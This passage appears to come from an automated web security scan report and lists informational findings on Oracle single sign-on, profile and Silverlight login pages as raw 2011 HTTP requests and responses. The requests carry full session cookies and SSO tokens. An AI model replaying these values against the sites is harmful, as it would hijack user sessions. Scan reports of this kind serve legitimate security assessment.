GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Set-Cookie: OAM_REQ=VERSION_4~rHPhjRXD8QG6y%2fjCF%2bf%2fFZxcUX2CeXT0kcF2HTkMBOcLLkOvSuyr1Rb6BgvZDb5rg6a0rsA2Vmqdh11OVr%2frjPFoakHkP4kqM%2fW2ScpLBTkndAEAA2WYI1tIHWQwG%2fsbefHfB9laP%2bnXJPBzUJKEocy63IaWPJ2oqlrXAEvrcDDtOwHniU4Bbe4VWlOBMFw1HU9k0lg6UOcybg33ovXi3j6ZhQDLXzzwUjBER6phLEgEyzEUi%2fIKRtSXeGM6svDt1sR4af58MTwFuyK4at%2bWdZb0BeLph6HJdrvE4Yfy0gZidhK%2bAAd%2bHocmNdHX8qOgIQodQCgEMkBdKhvp75VXVh6M%2fROaMtkyRqOrbAc%2biSu%2f21%2fc8pcgcPejh4C7czA%2f6VftbwCC1aqncoN%2bYJU9AuerZJ4TJsokHbI%2bxX4MLOJ9w3lfYeBe0MXOfdf0AIfbN0cVYQCS%2f%2fDnLonKc6UHxtGv5%2fso45PWSJ8D9JG%2bNavv3ahdnklHFNbkwGPlrMWXn%2bI9%2fTdm9yHdlaUaUAxY6fm4g2WwbpPBLTHlHS0eF6MSWC9%2bF2X%2f52ogwelXUDNVB8Ae5bG1U%2f%2bYg0TQzN5v66C0Yd7XN%2fbfWPG3Cdiys%2fVWXaZU%2fClAgHeeoSd6dk5Z98IKkjzpmCZjv%2bn48ijiSHAnXZAzwajzC7e8Eqtv48Zu2VESny4E9z90l%2ffqAxyMd1tlLCFe5ppuQhpfhyleb01FWZHx8DdhBMD9I7wwjJMCMFHOb5mrJdd6PphGh9c8FFSesutrMAsrZyc54qSVknzgoxqBZJB%2fsSPlptZKwj4OXGZxhXEp8y8Rm4Pckimkagl9cL4VS3PzSnqlJJbBlofFyLagB7IsSfMigwWIwPKB8Aw%2fXr1wb3xNGmx5uSkQ4pLNesPwiiSLzXUTlUgvtP9fHLZZNmo4yjJoOWOQigXmIesWpMjAHfrMTnbk30EISqJJWmlYK%2ftErfbfMwsmS0UPxinI6GtFJ4lo7E6LkqE7W71gXxH0NXBsoj2dy1ZC0Z01WE1KBm1NALFivG2PcVXmpwka2jrR60xtB3i5CNVuFAZHyBb9n24aMWZJ06bxr6Vpv2aEymBPGj3kS%2f6OVq4bNCMHKTQkVFH0W%2f3tF%2fMZ5BBkAKszgNeiujHqh4y2C8ZtzY0iV8JrjjMGhy3%2bT9lJKbYiPp99%2bctXkfISmUU3vfsbPq6omC%2bsuYo068a4q4deDf9sD5vfNLBVe0BnGVpwl5eX8j00WYtUcR18BtGtcj3DEqvezGNCdVfi68UR%2bvrAQ827BghHlilw0TzOvuvqMnt%2fsp5pK8CrD7WVaQw9pc8ds6uhB6ivvnXZP9DvyxBPh71Zu9dfTSy0SDviiwEVS4hKX8EFLy%2fVv1RtgLytG%2bYFgX60K%2byQwd%2fLe34eWdwVP4HcrSvzJYbckecreY3BSxFE943HLGDwOtl4ruhmA9SNoL%2b8bqR19n2VTVJgdhlDzQJ1X6pP9YoA3vywNypQWhr22dx1jE1U4gIDlwow6lpPKgwBLWA%2b3kMbndWD3WPoZ3ZIHhPpMXUg08smbH8Sdy3IaFRvG6bbaU5GcZkH%2f6Ow6JfzGn1UmFn1NggSbsG3c10P5UeHaNjGNjbpis%2bk0scc0yAEBEau3eDSNJYmBkU24neLUPANvyF59o1c6fYijn5MowQGcvJesm7H4NZ4SDEtcnIDllFKLp5ZaqaptPlSKzSJnWPAku6%2b9LYJ1UM0TVS1DLy2h7euLn4Vq1zlc9zziccHk%2fNnE12LWblXJSuay0cvprgwm0%2b9a1y2MNJVkQn%2f7Rj95Fn0AhkugaFeft5QJJ5LkKo4%2bQ873G9gTomi6XI6WO%2bw%2brNwUJyHiBQILq9c3daU3mlKo6km8d81vHwohyC0eR4WaAMqwIqkCbBnlhR6ZSegfE8Zyexls1oGiwKtwif1jfvhff9GwFci8wP8HhZEfoG6EaIx94z4p6KLbXp%2f60t2rxUch2%2fDbyfSxfOjTAQbk3h5ReIq2izOVtjAgHzG%2bpQtgaXpmtUWoAEXm30xSqtVivDKNJ6l6cj2BDzvQr4Qc2R7ibEYavShPpym%2fxYVNIsYDot1e6uABrIYmqUlAlvymA5agP5wjVyJJa6b61Mcry3uf%2fj9O8m16SS46JomgAOI7CpaWpGNbn3XdScM%2f4fAm4PxeC%2frE4g950Simk2vrTVukQqCndyj8%2fWo9IUE2TsXcB1BXafBKIUhfdX3NVy3mzxikpgMZgYhyuzX1pCBLxVQFqFS00ptuVyO%2fO50qOPARagZLCieJrQGp3cFN%2fT8L2vn%2fUfhnv94707MdrnCQtEqyooGRk%2fiuNGQnJ%2fh9BgS8kexVv3Oo5BwANDB3YnqqNYJtjx8wdii85X4BGuonRAhEanru9bBYBjfzVMCyKrgbGhImmVNg5fO42WxeW0FCV1uS33ICsGC0eIbG2pWqSeYFL8znPl1wTy7upc%2fmkshg0nZX1IIU8eLDab1nOW39%2fivWmUK%2f8Z3khcAyPF4ssLjlESGYV0Rec8zh44N14HNEkl1HV%2f1C3%2fsFAWat5q0batJwSvYZu%2f37cquKNz9ylNGnFlZT3G5dc9vMDrXEP6WoEKkZmDzV7j5B8eJ%2bzDjfYlroY8EwmagBDCr9Oc3cFtp3425w4SE5wuzqLJtb8beqRcZ9fNSDrB0iLlU9XJzsRUUHvZJ3ShLSR%2fumACB9gf0IkfakmZHLfufn2F9s2onFRG%2b4UfqkfK3dptld84hsptcZ%2bWuCB0pUsLWTW9dTSLmfspp%2fk60jwieLBfibvbC4195ntM%2bFliH5fdP2%2fO2BoXP4uQciAPvddz5O%2fq1mVjNuv%2ft8V8J3Gtr9xkZxJiH7MmyGfZ3N4ySXv3f1L3GGK9Bm0UNbz0nxuT8wDY6J%2fp1nPja6a1jNsoLpVZeN3VpiT6xdbD6ntPfiCKLEJQrSaOO%2fKzaorqdq0E5pElr4OQTE3%2b4jmgVigvPGlFRd7F52RSOaXFsR0W%2bswawVxLqDNv7C6NueZkh8wOqbqvvUez1oz6Dcqa3qJnsl3HrvPedfbqkCZIcY5cTya1ES6DwdDpLpfD0SoTmD9IEcLBnFgiIIu2W%2blGphWB8f3Y0Vyvhhm3nuednaJO1rasC3EMp7IJV4N2L4TNbmgLK6i6jPfW7DQ1Hz7uSKToangEJMfIgYRcmHdLeq0%2b2jny3hqNXi%2f9Tp4ohijG1E%2fip%2fX%2bLAms3MQle%2frRDAoWFtgHQsjKaGxuEPl1i88XOWh528FAPHlF8O104qHdRM0ua%2bhay5U7ku6w6c4CWMcp0RcVK8vF2A%2bCCk0ExnkNsSXwo%2fsUjhJn9L3DX%2b3OWPsSVGI4OqNCg3x5WGHPPXrrgf8CDpRcD0PqYLo%2bwT7Qzu%2f8LnFJZdO1zK0s6kPsdO7uSZY0T1spJYutSMcFxIL%2bHHhhDWdPwOXwj1R9JV%2bd9U3LcVsbT07rAWYMQ6mC7lNvzyGBy7tRYULsxWi8UJpK%2facmmiaHSKILs1IjZZX1IYkTBtohUePcMmrV1t%2bcWDTkJloPjKjK9TdiVaLVyHMwDUVA0uftR48E4rrdGen6drbCBdq2NzOZjOv0tdPVSOiHjsQxG9%2f7Dn6AhR5x936i4nAEwbSCryzHT6R%2bJH4d9hOiBtezy6pp4bgYO; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000It^IrK66uHK6EVADUS1DIbuZ00C3GL
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/
Content-Length: 6016

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

13.24. https://login.oracle.com/sso_loginui/oracle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/oracle.css

Request

GET /sso_loginui/oracle.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 09:59:40 GMT
ETag: "97d17-2eb0-480db70c"
Accept-Ranges: bytes
Content-Length: 11952
Connection: close
Content-Type: text/css
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

<STYLE TYPE="text/css">


/* TEXT STYLES */
.betastuff { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; text-decoration: none }

.bodylink {font-family: Arial, H
...[SNIP]...

13.25. https://login.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /

Request

GET / HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hxt33s55a1yyxpqmorzegwfx; omniID=1298950646238_fd2a_b49d_f334_6636d557aa57; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:40:14 GMT
Content-Length: 491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</tit
...[SNIP]...

13.26. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/createUser.jspx

Request

GET /EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: http://landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8810727&src=6804803&Act=24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: JSESSIONID=wV5TNpMQRFZ414LTg1285Xs447nvYWhb5rCyPRTzTmLll3QvwQ1v!957286243!-1013772183; path=/; secure; HttpOnly
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=167047533085868664,1)
Set-Cookie: BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000; path=/
Content-Length: 39228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html dir="ltr" lang="en"><head id="d1__xc_h"><title>Create User</title><meta name="generator" con
...[SNIP]...

13.27. https://myprofile.oracle.com/EndUser/faces/profile/resetPassword.jspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/faces/profile/resetPassword.jspx

Request

GET /EndUser/faces/profile/resetPassword.jspx HTTP/1.1
Host: myprofile.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=167057604784386469,0)
Content-Length: 8249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html dir="ltr" lang="en"><head id="d1__xc_h"><title>Reset Password</title><meta name="generator"
...[SNIP]...

13.28. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Request

GET /EndUser/images/logo-oracle-red.png HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:23:29 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=3600+360;age=159;ecid=167047631870118073,0)
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

13.29. https://myprofile.oracle.com/EndUser/jscripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Request

GET /EndUser/jscripts/s_code.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
